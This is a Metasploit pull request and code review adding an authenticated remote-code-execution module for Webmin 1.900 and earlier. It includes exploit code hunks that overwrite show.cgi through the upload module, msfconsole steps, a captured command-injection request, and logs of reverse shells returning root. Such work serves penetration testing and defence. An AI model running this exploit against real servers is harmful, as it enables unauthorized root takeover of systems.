### PR TITLE
Add Webmin Upload Download Module Exec

### PR DESCRIPTION
**Pull request by Ziconius**
Adding Webmin RCE module affecting Webmin <= 1.900. Module attempts to use the Running Processes (proc) permission to determine upload dir, if the permission is not set the module fails. The user can attempt the exploit without this permission by setting the 'GUESSUPLOAD' opt to true.

The default path is in an array of 1 to allow for other OS/version default paths to be added in future.

## Verification

`msfconsole`
`use exploit/unix/webapp/webmin_1900_rce`
`set USERNAME user`
`set PASSWORD password`
`set RHOSTS 127.0.0.1`
`check`
`exploit`

Assuming the target user has the 'proc' permission, this will return a root shell to the user. If the target user does not have the permission this will fail. 

To attempt to overcome the lack of 'proc' we can:
`msfconsole`
`use exploit/unix/webapp/webmin_1900_rce`
`set USERNAME user`
`set PASSWORD password`
`set GUESSUPLOAD true`
`set RHOSTS 127.0.0.1`
`check`
`exploit`

If Webmin is installed using default values, the user will have root shell returned.

### CODE REVIEW

File: modules/exploits/unix/webapp/webmin_1900_rce.rb [hunk 1]
```diff
@@ -0,0 +1,299 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'uri'
```
Comment (wchen-r7) [inline modules/exploits/unix/webapp/webmin_1900_rce.rb]: Hmm? Do you actually need to require this? I thought `HttpClient` would do that for you already?

Comment (Ziconius) [reply modules/exploits/unix/webapp/webmin_1900_rce.rb]: Thanks, I've removed `require 'uri'` now and re-run exploit.

**Comment by wchen-r7** [comment]
Thank you! By the way, usually Metasploit modules rely on `Rex::MIME::Message.new` to create MIME messages, and I notice you're crafting raw as a string. Is there a reason why you had to do that? Any trouble with `Rex::MIME::Message.new`? Just curious. Thanks.

**Comment by Ziconius** [comment]
## Testing 
### Webmin 1.900 on Ubuntu 18.03 Linux 4.15.0-20-generic
```
msf5 > use exploit/unix/webapp/webmin_1900_rce 
msf5 exploit(unix/webapp/webmin_1900_rce) > set rhost 172.17.0.2
rhost => 172.17.0.2
msf5 exploit(unix/webapp/webmin_1900_rce) > set username johann
username => johann
msf5 exploit(unix/webapp/webmin_1900_rce) > set password ChocolateCake!
password => ChocolateCake!
msf5 exploit(unix/webapp/webmin_1900_rce) > set guessupload true
guessupload => true
msf5 exploit(unix/webapp/webmin_1900_rce) > show options

Module options (exploit/unix/webapp/webmin_1900_rce):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   GUESSUPLOAD  true             yes       If the 'Running Process' permission is not given to the user guess the path.
   PASSWORD     ChocolateCake!   yes       Webmin Password
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       172.17.0.2       yes       The target address range or CIDR identifier
   RPORT        10000            yes       The target port (TCP)
   SSL          true             yes       Use SSL
   USERNAME     johann           yes       Webmin Username
   VHOST                         no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.128    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.900
msf5 exploit(unix/webapp/webmin_1900_rce) > check

[+] Login successful
[*] Attempting to execute...
[+] 172.17.0.2:10000 - The target is vulnerable.
msf5 exploit(unix/webapp/webmin_1900_rce) > run

[*] Started reverse TCP double handler on 192.168.2.128:4444 
[*] Attempting to login...
[+] Login successfully
[*] Target URL => https://172.17.0.2:10000
[*] Searching for directory to upload...
[+] Attempting: /usr/share/webmin/file
[+] Vulnerable show.cgi file was successfully uploaded.
[*] Attempting to execute the payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Payload executed successfully
[*] Command: echo cNBEAKBXCEme7ngG;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "cNBEAKBXCEme7ngG\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 4 opened (192.168.2.128:4444 -> 192.168.2.1:36418) at 2019-02-12 04:07:58 -0500

whoami
root
```

File: modules/exploits/unix/webapp/webmin_1900_rce.rb [hunk 2]
```diff
@@ -0,0 +1,296 @@
...
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  ##
+  # Exploiting phase
+  ##
+
+  def exploit
+    peer = "#{rhost}:#{rport}"
```
Comment (bcoles) [inline modules/exploits/unix/webapp/webmin_1900_rce.rb]: Is this required? It shouldn't be required. `peer` should be automatically declared by the `Msf::Exploit::Remote::HttpClient` mixin.

```
# grep -n "def peer" lib/msf/core/exploit/http/client.rb -B 3 -A 3
617-  #
618-  # Returns the Host and Port as a string
619-  #
620:  def peer
621-    "#{rhost}:#{rport}"
622-  end
623-
```

File: modules/exploits/unix/webapp/webmin_1900_rce.rb [hunk 3]
```diff
@@ -0,0 +1,296 @@
...
+      'headers' =>
+        {
+          'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}',
+          'Referer' => "#{ssl}#{peer}/updown/?xnavigation=1"
+        },
+      'cookie' => "redirect=1; testing=1; sid=#{session}"
+    )
+
+    if res2 && res2.code == 200 && res2.body =~ /Saving file/
+      print_good "Vulnerable show.cgi file was successfully uploaded."
```
Comment (bcoles) [inline modules/exploits/unix/webapp/webmin_1900_rce.rb]: Is this description accurate? (I haven't read the advisory).

Is `show.cgi` overwritten? It looks like `show.cgi` is required for exploitation.

What happens if `show.cgi` is overwritten - would that break the application? would it prevent re-exploitation?

If so, then `ExcellentRanking` is not an appropriate rank.

File: modules/exploits/unix/webapp/webmin_1900_rce.rb [hunk 4]
```diff
@@ -0,0 +1,296 @@
...
+    end
+  end
+
+  def upload_attempt(ssl, peer, session, dir)
+    boundary = Rex::Text.rand_text_alphanumeric(29)
+
+    data2 = "-----------------------------#{boundary}\r\n"
+    data2 << "Content-Disposition: form-data; name=\"upload0\"; filename=\"show.cgi\"\r\n"
+    data2 << "Content-Type: application/octet-stream\r\n\r\n"
+    data2 << "#!/usr/local/bin/perl\n# show.cgi\n# Output some file for the browser\n\n"
```
Comment (bcoles) [inline modules/exploits/unix/webapp/webmin_1900_rce.rb]: See sinner's comment about using the Mime lib.

If a raw HTTP request is required, please use a [Heredoc](https://www.rubyguides.com/2018/11/ruby-heredoc/). This code is unreadable and hard to maintain.

File: modules/exploits/unix/webapp/webmin_1900_rce.rb [hunk 5]
```diff
@@ -0,0 +1,296 @@
...
+    else
+      print_error "Authentication failed"
+      return
+    end
+
+    ##
+    # Directory and SSL verification for referer
+    ##
+    ps = datastore['SSL'].to_s
+    guess_dir = datastore['GUESSUPLOAD'].to_s
```
Comment (bcoles) [inline modules/exploits/unix/webapp/webmin_1900_rce.rb]: `GUESSUPLOAD` is Boolean `OptBool`. No need to convert to string `to_s`.

File: modules/exploits/unix/webapp/webmin_1900_rce.rb [hunk 6]
```diff
@@ -0,0 +1,296 @@
...
+      stpdir =
+        res1
+        .body.scan(/perl.+miniserv.pl/)
+        .map { |s| s.split("perl ").last }
+        .map { |d| d.split("miniserv").first }
+        .map { |d| d.split("miniserv").first }
+      if !stpdir[0].nil?
+        dir = stpdir[0] + "file"
+        print_good("Directory to upload => #{dir}")
+      elsif guess_dir == "true" && stpdir[0].nil?
```
Comment (bcoles) [inline modules/exploits/unix/webapp/webmin_1900_rce.rb]: `GUESSUPLOAD` is Boolean `OptBool`. No need to convert to string `to_s`.

```suggestion
      elsif guess_dir && stpdir[0].nil?
```

File: modules/exploits/unix/webapp/webmin_1900_rce.rb [hunk 7]
```diff
@@ -0,0 +1,296 @@
...
+        array = ["/usr/share/webmin/file"]
+        array.each do |i|
+          print_good("Attempting: " + i)
+          upload_attempt(ssl, peer, session, i)
```
Comment (bcoles) [inline modules/exploits/unix/webapp/webmin_1900_rce.rb]: See previous comment. Passing `ssl` to this method shouldn't be necessary.

File: modules/exploits/unix/webapp/webmin_1900_rce.rb [hunk 8]
```diff
@@ -0,0 +1,296 @@
...
+        .body.scan(/perl.+miniserv.pl/)
+        .map { |s| s.split("perl ").last }
+        .map { |d| d.split("miniserv").first }
+        .map { |d| d.split("miniserv").first }
+      if !stpdir[0].nil?
+        dir = stpdir[0] + "file"
+        print_good("Directory to upload => #{dir}")
+      elsif guess_dir == "true" && stpdir[0].nil?
+        array = ["/usr/share/webmin/file"]
+        array.each do |i|
```
Comment (bcoles) [inline modules/exploits/unix/webapp/webmin_1900_rce.rb]: What is the purpose of iterating through an array with one element?

```
2.3.0 :001 > array = ["/usr/share/webmin/file"]
 => ["/usr/share/webmin/file"] 
2.3.0 :002 > array.each do |i|
2.3.0 :003 >     puts i
2.3.0 :004?>   end
/usr/share/webmin/file
 => ["/usr/share/webmin/file"] 
2.3.0 :005 > 
```

File: modules/exploits/unix/webapp/webmin_1900_rce.rb (hunk 3 above)
Comment (Ziconius) [reply modules/exploits/unix/webapp/webmin_1900_rce.rb]: The 'show.cgi' is overwritten a modified version of itself which allows RCE - the application remains entirely functional.

File: modules/exploits/unix/webapp/webmin_1900_rce.rb (hunk 4 above)
Comment (Ziconius) [reply modules/exploits/unix/webapp/webmin_1900_rce.rb]: Ok - I will update to the correct format shortly.

**Comment by AgoraSecurity** [comment]
I believe there's a bug. I can't use the exploit in Webmin 1.900.

After debugging using burp, I saw that the payload is having issues:
```
GET /file/show.cgi/bin/|sh -c
Host: 192.168.1.10:10000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sid=85a84ff15eeb7d820c852114bd0c5036
Content-Type: application/x-www-form-urlencoded
Connection: close
```

File: modules/exploits/unix/webapp/webmin_1900_rce.rb (hunk 2 above)
Comment (AgoraSecurity) [inline modules/exploits/unix/webapp/webmin_1900_rce.rb]: This should include vhost if available

Comment (bcoles) [reply modules/exploits/unix/webapp/webmin_1900_rce.rb]: `peer` should already be defined by the `Msf::Exploit::Remote::HttpClient` mixin and shouldn't need to be redefined.

I *think* the mixin makes use of `vhost` for `peer`.

**Comment by AgoraSecurity** [comment]
Update: If I use the code in https://pentest.com.tr/exploits/Webmin-1900-Remote-Command-Execution.html I do get a shell

**Comment by jrobles-r7** [comment]
> Update: If I use the code in https://pentest.com.tr/exploits/Webmin-1900-Remote-Command-Execution.html I do get a shell

Looks like there is an error with the upload logic. If a directory is found then the upload directory is printed but `#upload_attempt` isn't called.

File: modules/exploits/unix/webapp/webmin_1900_rce.rb [hunk 9]
```diff
@@ -0,0 +1,296 @@
...
+      print_status "Searching for directory to upload..."
+      stpdir =
+        res1
+        .body.scan(/perl.+miniserv.pl/)
+        .map { |s| s.split("perl ").last }
+        .map { |d| d.split("miniserv").first }
+        .map { |d| d.split("miniserv").first }
+      if !stpdir[0].nil?
+        dir = stpdir[0] + "file"
+        print_good("Directory to upload => #{dir}")
```
Comment (jrobles-r7) [inline modules/exploits/unix/webapp/webmin_1900_rce.rb]:
```suggestion
        print_good("Directory to upload => #{dir}")
        upload_attempt(ssl, peer, session, dir)
```

**Comment by jrobles-r7** [comment]
### Tested Webmin 1.900 on Ubuntu 18.04

```
msf5 > use exploit/unix/webapp/webmin_upload_exec
msf5 exploit(unix/webapp/webmin_upload_exec) > set rhosts 172.22.222.154
rhosts => 172.22.222.154
msf5 exploit(unix/webapp/webmin_upload_exec) > set username unixuser
username => unixuser
msf5 exploit(unix/webapp/webmin_upload_exec) > set password unixuser
password => unixuser
msf5 exploit(unix/webapp/webmin_upload_exec) > set guessupload true
guessupload => true
msf5 exploit(unix/webapp/webmin_upload_exec) > 
msf5 exploit(unix/webapp/webmin_upload_exec) > 
msf5 exploit(unix/webapp/webmin_upload_exec) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[+] Session cookie: 8ff1f67441bb3e94ff6bb691fb2d4025
[*] Target URL => https://172.22.222.154:10000
[*] Searching for directory to upload...
[!] Could not determine upload directory. Using /usr/share/webmin/
[+] File kfyqmczw.cgi was successfully uploaded.
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.154:38966) at 2019-03-14 13:46:14 -0500
[+] Deleted kfyqmczw.cgi

uname -a
Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
whoami
root
exit
```

**Comment by jrobles-r7** [comment]
## Release Notes

The `exploit/unix/webapp/webmin_upload_exec` module performs a post authentication file upload to the Webmin CGI directory. The uploaded file executed by sending a request to the appropriate URI. The Webmin account needs access to the "Upload and Download" module to perform the file upload.

**Pull request merged**